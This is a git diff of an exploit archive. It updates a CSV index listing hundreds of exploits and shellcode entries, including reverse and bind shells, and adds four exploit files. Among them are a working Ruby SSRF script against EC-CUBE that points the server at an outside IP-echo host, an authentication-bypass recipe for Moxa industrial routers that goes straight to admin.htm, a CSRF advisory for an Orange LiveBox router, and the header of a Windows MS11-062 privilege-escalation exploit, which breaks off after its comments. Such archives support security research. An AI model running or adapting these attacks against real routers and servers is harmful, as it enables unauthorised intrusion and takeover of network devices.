Host 1.65 - Cross-Site Request Forgery",2015-11-16,hyp3rlinx,php,webapps,0 @@ -35197,7 +35197,7 @@ id,file,description,date,author,platform,type,port 38840,platforms/hardware/webapps/38840.txt,"Belkin N150 Wireless Home Router F9K1009 v1 - Multiple Vulnerabilities",2015-12-01,"Rahul Pratap Singh",hardware,webapps,80 38841,platforms/php/webapps/38841.txt,"ZenPhoto 1.4.10 - Local File Inclusion",2015-12-01,hyp3rlinx,php,webapps,80 38842,platforms/php/webapps/38842.txt,"Testa OTMS - Multiple SQL Injections",2013-11-13,"Ashiyane Digital Security Team",php,webapps,0 -38843,platforms/php/webapps/38843.txt,"TomatoCart - 'install/rpc.php' Local File Inclusion",2013-11-18,Esac,php,webapps,0 +38843,platforms/php/webapps/38843.txt,"TomatoCart 1.1.8.2 - 'class' Parameter Local File Inclusion",2013-11-18,Esac,php,webapps,0 38835,platforms/multiple/local/38835.py,"Centos 7.1 / Fedora 22 - abrt Privilege Escalation",2015-12-01,rebel,multiple,local,0 38836,platforms/multiple/webapps/38836.txt,"ntop-ng 2.0.151021 - Privilege Escalation",2015-12-01,"Dolev Farhi",multiple,webapps,0 38837,platforms/php/webapps/38837.txt,"IP.Board 4.1.4.x - Persistent Cross-Site Scripting",2015-12-01,"Mehdi Alouache",php,webapps,0 @@ -35222,7 +35222,7 @@ id,file,description,date,author,platform,type,port 38862,platforms/php/webapps/38862.txt,"Enorth Webpublisher CMS - 'thisday' Parameter SQL Injection",2013-12-06,xin.wang,php,webapps,0 38863,platforms/php/webapps/38863.php,"NeoBill - /modules/nullregistrar/PHPwhois/example.php query Parameter Remote Code Execution",2013-12-06,KedAns-Dz,php,webapps,0 38864,platforms/php/webapps/38864.php,"NeoBill - /install/include/solidstate.php Multiple Parameter SQL Injection",2013-12-06,KedAns-Dz,php,webapps,0 -38865,platforms/php/webapps/38865.txt,"NeoBill - /install/index.php language Parameter Traversal Local File Inclusion",2013-12-06,KedAns-Dz,php,webapps,0 +38865,platforms/php/webapps/38865.txt,"NeoBill 0.9-alpha - 'language' Parameter Local File Inclusion",2013-12-06,KedAns-Dz,php,webapps,0 39563,platforms/php/webapps/39563.txt,"Kaltura Community Edition <= 11.1.0-2 - Multiple Vulnerabilities",2016-03-15,Security-Assessment.com,php,webapps,80 38867,platforms/php/webapps/38867.txt,"WordPress Plugin Advanced uploader 2.10 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0 38868,platforms/php/webapps/38868.txt,"WordPress Plugin Sell Download 1.0.16 - Local File Disclosure",2015-12-04,KedAns-Dz,php,webapps,0 @@ -35247,9 +35247,9 @@ id,file,description,date,author,platform,type,port 38887,platforms/php/webapps/38887.txt,"iScripts AutoHoster - /additionalsettings.php cmbdomain Parameter SQL Injection",2013-12-15,i-Hmx,php,webapps,0 38888,platforms/php/webapps/38888.txt,"iScripts AutoHoster - /payinvoiceothers.php invno Parameter SQL Injection",2013-12-15,i-Hmx,php,webapps,0 38889,platforms/php/webapps/38889.txt,"iScripts AutoHoster - /support/parser/main_smtp.php Unspecified Traversal",2013-12-15,i-Hmx,php,webapps,0 -38890,platforms/php/webapps/38890.txt,"iScripts AutoHoster - /websitebuilder/showtemplateimage.php tmpid Parameter Traversal Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0 -38891,platforms/php/webapps/38891.txt,"iScripts AutoHoster - /admin/downloadfile.php fname Parameter Traversal Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0 -38892,platforms/php/webapps/38892.txt,"iScripts AutoHoster - /support/admin/csvdownload.php id Parameter Traversal Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0 +38890,platforms/php/webapps/38890.txt,"iScripts AutoHoster - 'tmpid' Parameter Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0 +38891,platforms/php/webapps/38891.txt,"iScripts AutoHoster - 'fname' Parameter Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0 +38892,platforms/php/webapps/38892.txt,"iScripts AutoHoster - 'id' Parameter Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0 38895,platforms/php/webapps/38895.txt,"SIMOGEO FileManager 2.3.0 - Multiple Vulnerabilities",2015-12-08,HaHwul,php,webapps,80 38896,platforms/xml/webapps/38896.py,"OpenMRS 2.3 (1.11.4) - XML External Entity (XXE) Processing Exploit",2015-12-08,LiquidWorm,xml,webapps,0 38897,platforms/xml/webapps/38897.txt,"OpenMRS 2.3 (1.11.4) - Expression Language Injection",2015-12-08,LiquidWorm,xml,webapps,0 @@ -35276,9 +35276,9 @@ id,file,description,date,author,platform,type,port 38918,platforms/windows/remote/38918.txt,"Microsoft Office / COM Object - els.dll DLL Planting (MS15-134)",2015-12-09,"Google Security Research",windows,remote,0 38919,platforms/php/webapps/38919.txt,"JForum 'adminUsers' Module - Cross-Site Request Forgery",2013-12-26,arno,php,webapps,0 40437,platforms/java/webapps/40437.txt,"Symantec Messaging Gateway 10.6.1 - Directory Traversal",2016-09-28,R-73eN,java,webapps,0 -38920,platforms/php/webapps/38920.txt,"AFCommerce - /afcontrol/adblock.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0 -38921,platforms/php/webapps/38921.txt,"AFCommerce - /afcontrol/adminpassword.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0 -38922,platforms/php/webapps/38922.txt,"AFCommerce - /afcontrol/controlheader.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0 +38920,platforms/php/webapps/38920.txt,"AFCommerce - 'adblock.php' Remote File Inclusion",2013-12-25,NoGe,php,webapps,0 +38921,platforms/php/webapps/38921.txt,"AFCommerce - 'adminpassword.php' Remote File Inclusion",2013-12-25,NoGe,php,webapps,0 +38922,platforms/php/webapps/38922.txt,"AFCommerce - 'controlheader.php' Remote File Inclusion",2013-12-25,NoGe,php,webapps,0 38923,platforms/windows/remote/38923.txt,"Apple Safari For Windows - PhishingAlert Security Bypass",2013-12-07,Jackmasa,windows,remote,0 38924,platforms/php/webapps/38924.txt,"WordPress 2.0.11 - '/wp-admin/options-discussion.php' Script Cross-Site Request Forgery",2013-12-17,MustLive,php,webapps,0 38927,platforms/php/webapps/38927.txt,"iy10 Dizin Scripti - Multiple Vulnerabilities",2015-12-10,KnocKout,php,webapps,80 @@ -35292,7 +35292,7 @@ id,file,description,date,author,platform,type,port 38935,platforms/asp/webapps/38935.txt,"CMS Afroditi - 'id' Parameter SQL Injection",2013-12-30,"projectzero labs",asp,webapps,0 38936,platforms/php/webapps/38936.txt,"WordPress Plugin Advanced Dewplayer - 'download-file.php' Script Directory Traversal",2013-12-30,"Henri Salo",php,webapps,0 38937,platforms/linux/local/38937.txt,"Apache Libcloud Digital Ocean API - Local Information Disclosure",2014-01-01,anonymous,linux,local,0 -38938,platforms/php/webapps/38938.txt,"xBoard - 'post' Parameter Local File Inclusion",2013-12-24,"TUNISIAN CYBER",php,webapps,0 +38938,platforms/php/webapps/38938.txt,"xBoard 5.0 / 5.5 / 6.0 - 'view.php' Local File Inclusion",2013-12-24,"TUNISIAN CYBER",php,webapps,0 38939,platforms/multiple/dos/38939.c,"VideoLAN VLC Media Player 1.1.11 - '.NSV' File Denial of Service",2012-03-14,"Dan Fosco",multiple,dos,0 38940,platforms/multiple/dos/38940.c,"VideoLAN VLC Media Player 1.1.11 - '.EAC3' File Denial of Service",2012-03-14,"Dan Fosco",multiple,dos,0 38941,platforms/php/webapps/38941.txt,"GoAutoDial CE 3.3 - Multiple Vulnerabilities",2015-12-12,R-73eN,php,webapps,0 @@ -35385,7 +35385,7 @@ id,file,description,date,author,platform,type,port 39029,platforms/php/webapps/39029.txt,"BloofoxCMS - /bloofox/index.php 'Username' Parameter SQL Injection",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 39030,platforms/php/webapps/39030.txt,"BloofoxCMS - /bloofox/admin/index.php 'Username' Parameter SQL Injection",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 39031,platforms/php/webapps/39031.html,"BloofoxCMS - /admin/index.php Cross-Site Request Forgery (Add Admin)",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 -39032,platforms/php/webapps/39032.txt,"BloofoxCMS - /admin/include/inc_settings_editor.php fileurl Parameter Local File Inclusion",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 +39032,platforms/php/webapps/39032.txt,"BloofoxCMS 0.5.0 - 'fileurl' Parameter Local File Inclusion",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 39033,platforms/php/webapps/39033.py,"Joomla! 1.5 < 3.4.5 - Object Injection x-forwarded-for Header Remote Code Execution",2015-12-18,"Andrew McNicol",php,webapps,80 39034,platforms/php/webapps/39034.html,"Ovidentia maillist Module 4.0 - Remote File Inclusion",2015-12-18,bd0rk,php,webapps,80 39035,platforms/win_x86-64/local/39035.txt,"Microsoft Windows 8.1 - 'win32k' Privilege Escalation (MS15-010)",2015-12-18,"Jean-Jamil Khalife",win_x86-64,local,0 @@ -35446,7 +35446,7 @@ id,file,description,date,author,platform,type,port 39091,platforms/php/dos/39091.pl,"WHMCS 5.12 - 'cart.php' Denial of Service",2014-02-07,Amir,php,dos,0 39092,platforms/php/dos/39092.pl,"phpBB 3.0.8 - Remote Denial of Service",2014-02-11,Amir,php,dos,0 39093,platforms/php/webapps/39093.txt,"Beezfud - Remote Code Execution",2015-12-24,"Ashiyane Digital Security Team",php,webapps,80 -39094,platforms/php/webapps/39094.txt,"Rips Scanner 0.5 - (code.php) Local File Inclusion",2015-12-24,"Ashiyane Digital Security Team",php,webapps,80 +39094,platforms/php/webapps/39094.txt,"Rips Scanner 0.5 - 'code.php' Local File Inclusion",2015-12-24,"Ashiyane Digital Security Team",php,webapps,80 39100,platforms/php/webapps/39100.txt,"WordPress Plugin NextGEN Gallery - 'jqueryFileTree.php' Directory Traversal",2014-02-19,"Tom Adams",php,webapps,0 39101,platforms/php/webapps/39101.php,"MODx Evogallery Module - 'Uploadify.php' Arbitrary File Upload",2014-02-18,"TUNISIAN CYBER",php,webapps,0 39102,platforms/windows/local/39102.py,"EasyCafe Server 2.2.14 - Remote File Read",2015-12-26,R-73eN,windows,local,0 @@ -35468,12 +35468,12 @@ id,file,description,date,author,platform,type,port 39120,platforms/windows/local/39120.py,"KiTTY Portable 0.65.1.1p - Local Saved Session Overflow (Egghunter XP_ Denial of Service 7/8.1/10)",2015-12-29,"Guillaume Kaddouch",windows,local,0 39121,platforms/windows/local/39121.py,"KiTTY Portable 0.65.0.2p - Local kitty.ini Overflow (Wow64 Egghunter Windows 7)",2015-12-29,"Guillaume Kaddouch",windows,local,0 39122,platforms/windows/local/39122.py,"KiTTY Portable 0.65.0.2p (Windows 8.1 / Windows 10) - Local kitty.ini Overflow",2015-12-29,"Guillaume Kaddouch",windows,local,0 -39124,platforms/php/webapps/39124.txt,"MeiuPic - 'ctl' Parameter Local File Inclusion",2014-03-10,Dr.3v1l,php,webapps,0 +39124,platforms/php/webapps/39124.txt,"MeiuPic 2.1.2 - 'ctl' Parameter Local File Inclusion",2014-03-10,Dr.3v1l,php,webapps,0 39125,platforms/windows/dos/39125.html,"Kaspersky Internet Security - Remote Denial of Service",2014-03-20,CXsecurity,windows,dos,0 39126,platforms/php/webapps/39126.txt,"BigACE Web CMS 2.7.5 - '/public/index.php' LANGUAGE Parameter Directory Traversal",2014-03-19,"Hossein Hezami",php,webapps,0 39127,platforms/cgi/webapps/39127.txt,"innoEDIT - 'innoedit.cgi' Remote Command Execution",2014-03-21,"Felipe Andrian Peixoto",cgi,webapps,0 39128,platforms/php/webapps/39128.txt,"Jorjweb - 'id' Parameter SQL Injection",2014-02-21,"Vulnerability Laboratory",php,webapps,0 -39129,platforms/php/webapps/39129.txt,"qEngine - 'run' Parameter Local File Inclusion",2014-03-25,"Gjoko Krstic",php,webapps,0 +39129,platforms/php/webapps/39129.txt,"qEngine 4.1.6 / 6.0.0 - 'task.php' Local File Inclusion",2014-03-25,"Gjoko Krstic",php,webapps,0 39130,platforms/cgi/webapps/39130.txt,"DotItYourself - 'dot-it-yourself.cgi' Remote Command Execution",2014-03-26,"Felipe Andrian Peixoto",cgi,webapps,0 39131,platforms/cgi/webapps/39131.txt,"Beheer Systeem - 'pbs.cgi' Remote Command Execution",2014-03-26,"Felipe Andrian Peixoto",cgi,webapps,0 39132,platforms/windows/local/39132.py,"FTPShell Client 5.24 - Buffer Overflow",2015-12-30,hyp3rlinx,windows,local,0 @@ -35590,15 +35590,15 @@ id,file,description,date,author,platform,type,port 39245,platforms/php/webapps/39245.txt,"Roundcube 1.1.3 - Directory Traversal",2016-01-15,"High-Tech Bridge SA",php,webapps,80 39246,platforms/php/webapps/39246.txt,"mcart.xls Bitrix Module 6.5.2 - SQL Injection",2016-01-15,"High-Tech Bridge SA",php,webapps,80 39250,platforms/php/webapps/39250.txt,"WordPress Plugin DZS-VideoGallery - Cross-Site Scripting / Command Injection",2014-07-13,MustLive,php,webapps,0 -39251,platforms/php/webapps/39251.txt,"WordPress Plugin BookX - 'includes/bookx_export.php' Local File Inclusion",2014-05-28,"Anant Shrivastava",php,webapps,0 +39251,platforms/php/webapps/39251.txt,"WordPress Plugin BookX 1.7 - 'bookx_export.php' Local File Inclusion",2014-05-28,"Anant Shrivastava",php,webapps,0 39252,platforms/php/webapps/39252.txt,"WordPress Plugin WP Rss Poster - 'wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0 39253,platforms/php/webapps/39253.txt,"WordPress Plugin ENL NewsLetter - 'wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0 39254,platforms/php/webapps/39254.html,"WordPress Plugin CopySafe PDF Protection - Arbitrary File Upload",2014-07-14,"Jagriti Sahu",php,webapps,0 39255,platforms/php/webapps/39255.html,"WEBMIS CMS - Arbitrary File Upload",2014-07-14,"Jagriti Sahu",php,webapps,0 39256,platforms/php/webapps/39256.txt,"WordPress Plugin Tera Charts (tera-charts) - charts/treemap.php fn Parameter Directory Traversal",2014-05-28,"Anant Shrivastava",php,webapps,0 39257,platforms/php/webapps/39257.txt,"WordPress Plugin Tera Charts (tera-charts) - charts/zoomabletreemap.php fn Parameter Directory Traversal",2014-05-28,"Anant Shrivastava",php,webapps,0 -39258,platforms/multiple/remote/39258.txt,"Alfresco - /proxy endpoint Parameter Server Side Request Forgery",2014-07-16,"V. Paulikas",multiple,remote,0 -39259,platforms/multiple/remote/39259.txt,"Alfresco - /cmisbrowser url Parameter Server Side Request Forgery",2014-07-16,"V. Paulikas",multiple,remote,0 +39258,platforms/multiple/remote/39258.txt,"Alfresco - /proxy endpoint Parameter Server-Side Request Forgery",2014-07-16,"V. Paulikas",multiple,remote,0 +39259,platforms/multiple/remote/39259.txt,"Alfresco - /cmisbrowser url Parameter Server-Side Request Forgery",2014-07-16,"V. Paulikas",multiple,remote,0 39260,platforms/windows/local/39260.txt,"WEG SuperDrive G2 12.0.0 - Insecure File Permissions",2016-01-18,LiquidWorm,windows,local,0 39261,platforms/php/webapps/39261.txt,"Advanced Electron Forum 1.0.9 - Cross-Site Request Forgery",2016-01-18,hyp3rlinx,php,webapps,80 39262,platforms/php/webapps/39262.txt,"Advanced Electron Forum 1.0.9 - Persistent Cross-Site Scripting",2016-01-18,hyp3rlinx,php,webapps,80 @@ -35612,7 +35612,7 @@ id,file,description,date,author,platform,type,port 39269,platforms/php/webapps/39269.txt,"WordPress Plugin Lead Octopus Power - 'id' Parameter SQL Injection",2014-07-28,Amirh03in,php,webapps,0 39270,platforms/php/webapps/39270.txt,"WordPress Plugin WhyDoWork AdSense - options-general.php Cross-Site Request Forgery (Option Manipulation)",2014-07-28,"Dylan Irzi",php,webapps,0 39271,platforms/php/webapps/39271.txt,"CMSimple - Default Administrator Credentials",2014-07-28,"Govind Singh",php,webapps,0 -39272,platforms/php/webapps/39272.txt,"CMSimple - Remote file Inclusion",2014-07-28,"Govind Singh",php,webapps,0 +39272,platforms/php/webapps/39272.txt,"CMSimple 4.4.4 - Remote file Inclusion",2014-07-28,"Govind Singh",php,webapps,0 39273,platforms/php/webapps/39273.txt,"CMSimple - /2author/index.php color Parameter Remote Code Execution",2014-07-28,"Govind Singh",php,webapps,0 39274,platforms/windows/dos/39274.py,"CesarFTP 0.99g - XCWD Denial of Service",2016-01-19,"Irving Aguilar",windows,dos,21 39275,platforms/windows/dos/39275.txt,"PDF-XChange Viewer 2.5.315.0 - Shading Type 7 Heap Memory Corruption",2016-01-19,"Sébastien Morin",windows,dos,0 @@ -35621,7 +35621,7 @@ id,file,description,date,author,platform,type,port 39278,platforms/hardware/remote/39278.txt,"Barracuda Web Application Firewall - Authentication Bypass",2014-08-04,"Nick Hayes",hardware,remote,0 39279,platforms/php/webapps/39279.txt,"WordPress Plugin wpSS - 'ss_handler.php' SQL Injection",2014-08-06,"Ashiyane Digital Security Team",php,webapps,0 39280,platforms/php/webapps/39280.txt,"WordPress Plugin HDW Player - 'wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0 -39281,platforms/php/webapps/39281.txt,"VoipSwitch - 'action' Parameter Local File Inclusion",2014-08-08,0x4148,php,webapps,0 +39281,platforms/php/webapps/39281.txt,"VoipSwitch - 'user.php' Local File Inclusion",2014-08-08,0x4148,php,webapps,0 39282,platforms/php/webapps/39282.txt,"WordPress Plugin GB Gallery Slideshow - 'wp-admin/admin-ajax.php' SQL Injection",2014-08-11,"Claudio Viviani",php,webapps,0 39283,platforms/php/webapps/39283.txt,"WordPress Plugin FB Gorilla - 'game_play.php' SQL Injection",2014-07-28,Amirh03in,php,webapps,0 39284,platforms/windows/local/39284.txt,"Oracle - HtmlConverter.exe Buffer Overflow",2016-01-21,hyp3rlinx,windows,local,0 @@ -36340,7 +36340,7 @@ id,file,description,date,author,platform,type,port 40042,platforms/php/webapps/40042.php,"WordPress Plugin Ultimate Membership Pro 3.3 - SQL Injection",2016-06-29,wp0Day.com,php,webapps,80 40043,platforms/windows/local/40043.py,"Cuckoo Sandbox Guest 2.0.1 - XMLRPC Privileged Remote Code Execution",2016-06-29,"Rémi ROCHER",windows,local,0 40044,platforms/cgi/webapps/40044.html,"Ubiquiti Administration Portal - Remote Command Execution (via Cross-Site Request Forgery)",2016-06-29,KoreLogic,cgi,webapps,443 -40045,platforms/php/webapps/40045.txt,"Concrete5 5.7.3.1 - (Application::dispatch) Local File Inclusion",2016-06-29,"Egidio Romano",php,webapps,80 +40045,platforms/php/webapps/40045.txt,"Concrete5 5.7.3.1 - 'Application::dispatch' Method Local File Inclusion",2016-06-29,"Egidio Romano",php,webapps,80 40092,platforms/php/webapps/40092.txt,"Beauty Parlour & SPA Saloon Management System - Blind SQL Injection",2016-07-11,"Yakir Wizman",php,webapps,80 40093,platforms/php/webapps/40093.txt,"Clinic Management System - Blind SQL Injection",2016-07-11,"Yakir Wizman",php,webapps,80 40049,platforms/linux/local/40049.c,"Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset OOB Privilege Escalation",2016-07-03,vnik,linux,local,0 @@ -36391,7 +36391,7 @@ id,file,description,date,author,platform,type,port 40181,platforms/linux/dos/40181.c,"AppArmor securityfs < 4.8 - aa_fs_seq_hash_show Reference Count Leak",2016-07-29,"Google Security Research",linux,dos,0 40171,platforms/linux/webapps/40171.txt,"AXIS Multiple Products - Authenticated Remote Command Execution via devtools Vector",2016-07-29,Orwelllabs,linux,webapps,80 40122,platforms/lin_x86-64/shellcode/40122.txt,"Linux/x86-64 - Syscall Persistent Bind Shell + Multi-terminal + Password + Daemon Shellcode (83_ 148_ 177 bytes)",2016-07-19,Kyzer,lin_x86-64,shellcode,0 -40125,platforms/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server Side Include (SSI) Daemon Remote Format String",2016-07-19,bashis,multiple,remote,0 +40125,platforms/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server-Side Include (SSI) Daemon Remote Format String",2016-07-19,bashis,multiple,remote,0 40126,platforms/php/webapps/40126.txt,"NewsP Free News Script 1.4.7 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80 40127,platforms/php/webapps/40127.txt,"newsp.eu PHP Calendar Script 1.0 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80 40128,platforms/lin_x86/shellcode/40128.c,"Linux/CRISv32 - Axis Communication Connect Back Shellcode (189 bytes)",2016-07-20,bashis,lin_x86,shellcode,0 @@ -36479,7 +36479,7 @@ id,file,description,date,author,platform,type,port 40222,platforms/lin_x86/shellcode/40222.c,"Linux/x86 - zsh TCP Bind Shell Port 9090 (96 bytes)",2016-08-10,thryb,lin_x86,shellcode,0 40223,platforms/lin_x86/shellcode/40223.c,"Linux/x86 - zsh Reverse TCP Shellcode port 9090 (80 bytes)",2016-08-10,thryb,lin_x86,shellcode,0 40224,platforms/windows/local/40224.txt,"Microsoft Word 2007/2010/2013/2016 - Out-of-Bounds Read Remote Code Execution (MS16-099)",2016-08-10,COSIG,windows,local,0 -40225,platforms/php/webapps/40225.py,"vBulletin 5.2.2 - Unauthenticated Server Side Request Forgery",2016-08-10,"Dawid Golunski",php,webapps,80 +40225,platforms/php/webapps/40225.py,"vBulletin 5.2.2 - Unauthenticated Server-Side Request Forgery",2016-08-10,"Dawid Golunski",php,webapps,80 40226,platforms/windows/local/40226.txt,"EyeLock Myris 3.3.2 - SDK Service Unquoted Service Path Privilege Escalation",2016-08-10,LiquidWorm,windows,local,0 40227,platforms/php/webapps/40227.txt,"EyeLock nano NXT 3.5 - Local File Disclosure",2016-08-10,LiquidWorm,php,webapps,80 40228,platforms/php/webapps/40228.py,"EyeLock nano NXT 3.5 - Remote Root Exploit",2016-08-10,LiquidWorm,php,webapps,80 @@ -36721,3 +36721,7 @@ id,file,description,date,author,platform,type,port 40618,platforms/windows/dos/40618.py,"Oracle VM VirtualBox 4.3.28 - '.ovf' Crash (PoC)",2016-10-21,"sultan albalawi",windows,dos,0 40619,platforms/hardware/remote/40619.py,"TrendMicro InterScan Web Security Virtual Appliance - Remote Code Execution (Shellshock)",2016-10-21,"Hacker Fantastic",hardware,remote,0 40620,platforms/php/webapps/40620.txt,"Zenbership 107 - Multiple Vulnerabilities",2016-10-23,Besim,php,webapps,0 +40626,platforms/hardware/webapps/40626.txt,"Orange Inventel LiveBox 5.08.3-sp - Cross-Site Request Forgery",2016-10-24,BlackMamba,hardware,webapps,0 +40627,platforms/windows/local/40627.c,"Microsoft Windows (x86) - 'NDISTAPI' Privilege Escalation (MS11-062)",2016-10-24,"Tomislav Paskalev",windows,local,0 +40628,platforms/php/webapps/40628.pl,"EC-CUBE 2.12.6 - Server-Side Request Forgery",2016-10-24,Wadeek,php,webapps,0 +40629,platforms/hardware/webapps/40629.txt,"Industrial Secure Routers EDR-810 / EDR-G902 / EDR-G903 - Insecure Configuration Management",2016-10-24,"Sniper Pex",hardware,webapps,0 diff --git a/platforms/hardware/webapps/40626.txt b/platforms/hardware/webapps/40626.txt new file mode 100755 index 000000000..f0f753de5 --- /dev/null +++ b/platforms/hardware/webapps/40626.txt @@ -0,0 +1,28 @@ +# Exploit Title: Orange Inventel LiveBox CSRF +# Google Dork: N/A +# Date: 10-24-2016 +# Exploit Author: BlackMamba TEAM (BM1) +# Vendor Homepage: N/A +# Version: Inventel - v5.08.3-sp +# Tested on: Windows 7 64bit +# CVE : N/A +# Category: Hardware + +1. Description +This Router is vulnerable to Cross Site Request Forgery , a hacker can send a well crafted link or well crafted web page(see the POC) to the administrator. +and thus change the admin password (without the need to know the old one). +this affects the other settings too (SSID name , SSID Security ,enabling disabling the firewall.......). + +2. Proof of Concept +this link once clicked the admin password is changed to "blackmamba" (withouth ") + +Cats !!! + +this link once clicked sets the SSID to "BLACKMAMBA" with the security to NONE (open wirless network) +Dogs :D !!! + +3. Mitigation +this is kinda obvious but DO NOT click on links you can't verify there origine specialy when connected to the Router's interface. + +------------------------------------------------------------------------------------------------------------------------------------------------------------ +From the Moroccan team : BLACK MAMBA (by BM1) diff --git a/platforms/hardware/webapps/40629.txt b/platforms/hardware/webapps/40629.txt new file mode 100755 index 000000000..2fdcf9bca --- /dev/null +++ b/platforms/hardware/webapps/40629.txt @@ -0,0 +1,38 @@ +Title: Industrial Secure Routers - Insecure Configuration Management +Type: Local/Remote +Author: Nassim Asrir +Author Company: HenceForth +Impact: Insecure Configuration Management +Risk: (4/5) +Release Date: 22.10.2016 + +Summary: +Moxa's EDR series industrial Gigabit-performance secure routers are designed to protect the control networks of critical facilities while maintaining fast data transmissions. +The EDR series security routers provides integrated cyber security solutions that combine industrial firewall, VPN, router, and L2 switching* functions into one product specifically +designed for automation networks,which protects the integrity of remote access and critical devices. + +description: + +Using this Vulnerability we can change the Admin configuration without knowing Password & Username + +Because the form for change the configurations is Insecure. + +Vendor: +http://www.moxa.com/product/Industrial_Secure_Routers.htm + +Affected Version: +EDR-810, EDR-G902 and EDR-G903 + +Tested On: +Linux // Dist (Bugtraq 2) + +Vendor Status: +I told them and i wait for the answer. + +PoC: +- when you navigate the server automatically you redirect to the login page (http://site/login.asp). + +- so Just add in the end of URL (admin.htm) then you get the Form to change the Admin configurations. + +Credits +Vulnerability discovered by Nassim Asrir - \ No newline at end of file diff --git a/platforms/php/webapps/40628.pl b/platforms/php/webapps/40628.pl new file mode 100755 index 000000000..3cee6f9cb --- /dev/null +++ b/platforms/php/webapps/40628.pl @@ -0,0 +1,89 @@ +# Exploit Title: EC-CUBE 2.12.6 Server-Side Request Forgery +# Date: 22/10/16 +# Exploit Author: Wad Deek +# Vendor Homepage: http://en.ec-cube.net/ +# Software Link: http://en.ec-cube.net/download/ +# Version: 2.12.6en-p1 +# Tested on: Xampp on Windows7 +# Fuzzing tool: https://github.com/Trouiller-David/PHP-Source-Code-Analysis-Tools +## +## +#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ +require('mechanize') +agent = Mechanize.new() +agent.read_timeout = 3 +agent.open_timeout = 3 +agent.keep_alive = false +agent.redirect_ok = true +agent.agent.http.verify_mode = OpenSSL::SSL::VERIFY_NONE +#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ +#=========================== +urls = < 4111111111111111, +"arg_key0" => 1, +"arg_key1" => 1, +"arg_key2" => 1, +"arg_key3" => 1, +"arg_key4" => 1, +"arg_key5" => 1, +"arg_key6" => 1, +"arg_key7" => 1, +"arg_key8" => 1, +"arg_key9" => 1, +"arg_val0" => 1, +"arg_val1" => 1, +"arg_val2" => 1, +"arg_val3" => 1, +"arg_val4" => 1, +"arg_val5" => 1, +"arg_val6" => 1, +"arg_val7" => 1, +"arg_val8" => 1, +"arg_val9" => 1, +#???????????????????????????????????????????????????????????? +"EndPoint" => "http://www.monip.org/index.php"+"?.jpg", +#???????????????????????????????????????????????????????????? +"mode=" => "", +"Operation" => 1, +"SecretKey" => 1, +"Service" => 1, +"Signature" => 1, +"Timestamp" => 1, +"type" => "index.php" +}) +body = response.body() +rescue +else +ip = response.body().scan(/IP : (.+?)>>> monip.org >>>> "+ip) +end +end +#}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}} +#=========================== +end +#=========================== + diff --git a/platforms/windows/local/40627.c b/platforms/windows/local/40627.c new file mode 100755 index 000000000..510de17ad --- /dev/null +++ b/platforms/windows/local/40627.c @@ -0,0 +1,538 @@ +/* +################################################################ +# Exploit Title: Windows x86 (all versions) NDISTAPI privilege escalation (MS11-062) +# Date: 2016-10-24 +# Exploit Author: Tomislav Paskalev +# Vulnerable Software: +# Windows XP SP3 x86 +# Windows XP Pro SP2 x64 +# Windows Server 2003 SP2 x86 +# Windows Server 2003 SP2 x64 +# Windows Server 2003 SP2 Itanium-based Systems +# Supported Vulnerable Software: +# Windows XP SP3 x86 +# Windows Server 2003 SP2 x86 +# Tested Software: +# Windows XP Pro SP3 x86 EN [5.1.2600] +# Windows Server 2003 Ent SP2 EN [5.2.3790] +# CVE ID: 2011-1974 +################################################################ +# Vulnerability description: +# An elevation of privilege vulnerability exists in the +# NDISTAPI.sys component of the Remote Access Service NDISTAPI +# driver. The vulnerability is caused when the NDISTAPI driver +# improperly validates user-supplied input when passing data +# from user mode to the Windows kernel. +# An attacker must have valid logon credentials and be able to +# log on locally to exploit the vulnerability. +# An attacker who successfully exploited this vulnerability could +# run arbitrary code in kernel mode (i.e. with NT AUTHORITY\SYSTEM +# privileges). +################################################################ +# Exploit notes: +# Privileged shell execution: +# - the SYSTEM shell will spawn within the invoking shell/process +# Exploit compiling (Kali GNU/Linux Rolling 64-bit): +# - # i686-w64-mingw32-gcc MS11-062.c -o MS11-062.exe -lws2_32 +# Exploit prerequisites: +# - low privilege access to the target OS +# - target OS not patched (KB2566454) +# - Remote Access Service (RAS) running +# - sc query remoteaccess +# - sc start remoteaccess +################################################################ +# Patches: +# Windows XP SP3 x86 +# WindowsXP-KB2566454-x86-enu.exe +# (not available - EoL) +# Windows Server 2003 SP2 x86 +# WindowsServer2003-KB2566454-x86-enu.exe +# https://www.microsoft.com/en-us/download/details.aspx?id=27093 +################################################################ +# Thanks to: +# Ni Tao (writeup) +# Google Translate (Chinese -> Engrish) +################################################################ +# References: +# https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1974 +# https://technet.microsoft.com/en-us/library/security/ms11-062.aspx +# 